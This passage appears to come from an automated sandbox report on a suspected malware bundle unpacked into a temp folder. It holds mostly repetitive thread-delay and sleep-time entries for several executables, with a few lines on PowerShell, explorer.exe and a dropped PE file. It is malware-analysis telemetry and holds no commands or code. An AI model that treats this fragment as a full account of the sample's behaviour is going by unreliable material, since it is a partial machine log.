                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 593355
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 593249
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 593061
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 592578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 592047
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 591859
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 591636
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 591483
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 591353
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 591187
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 591031
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 590895
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 590703
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 590527
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 590366
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 590233
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 590062
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 589265
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 589085
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 588875
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 588716
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 588594
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 588464
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 588328
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 588015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 587703
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 587500
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 587340
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 587193
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 587015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 586554
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 586163
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 586009
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 585883
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 585765
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 585624
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 585482
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 585373
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 585264
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 585154
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 585040
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 584922
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 584811
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 584702
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 584591
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 584470
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 584344
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 584234
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584115
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583828
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583620
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583469
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583233
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583123
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582905
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582795
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582684
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582577
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582466
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582330
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582203
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582093
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581982
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581874
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581765
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581656
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581547
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599844
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599708
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599485
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599313
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598985
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598678
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598486
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598338
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598232
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598123
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598011
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597825
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597683
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597556
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597437
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597317
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2049Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 361Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeWindow / User API: threadDelayed 5641
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeWindow / User API: threadDelayed 3928
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeWindow / User API: threadDelayed 5728
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeWindow / User API: threadDelayed 4254
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeWindow / User API: foregroundWindowGot 1711
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeWindow / User API: threadDelayed 1122
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 433
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 719
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 714
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r6f7sE.IJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeAPI coverage: 3.9 %
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeAPI coverage: 3.7 %
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeAPI coverage: 8.6 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 2049 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 361 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe TID: 7988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7324Thread sleep count: 175 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7324Thread sleep time: -5250000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7364Thread sleep count: 161 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7364Thread sleep time: -4830000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7908Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7324Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe TID: 7268Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe TID: 7944Thread sleep count: 143 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe TID: 7944Thread sleep time: -85800000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep count: 35 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -32281802128991695s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 1704Thread sleep count: 5641 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599886s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599655s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599543s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 1704Thread sleep count: 3928 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599424s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599303s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599172s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599048s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598922s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598812s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598671s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598333s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598187s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597992s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597867s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597746s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597578s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597440s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597307s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597182s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597015s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596892s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596771s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596625s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596497s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596359s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596156s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596020s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -595859s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -595250s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594844s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594699s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594578s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594422s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594265s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594071s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593916s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593784s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593625s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593484s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593355s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593249s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593061s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -592578s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -592047s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591859s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591636s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591483s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591353s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591187s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591031s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590895s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590703s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590527s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590366s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590233s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590062s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -589265s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -589085s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588875s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588716s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588594s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588464s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588328s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588015s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587703s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587500s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587340s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587193s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587015s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -586554s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -586163s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -586009s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585883s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585765s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585624s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585482s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585373s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585264s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585154s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -585040s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584922s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584811s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584702s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584591s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584470s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584344s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584234s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -584115s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583828s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583620s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583469s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583233s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583123s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -583015s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582905s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582795s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582684s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582577s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582466s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582330s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582203s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -582093s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581982s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581874s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581765s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581656s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -581547s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe TID: 8000Thread sleep count: 184 > 30
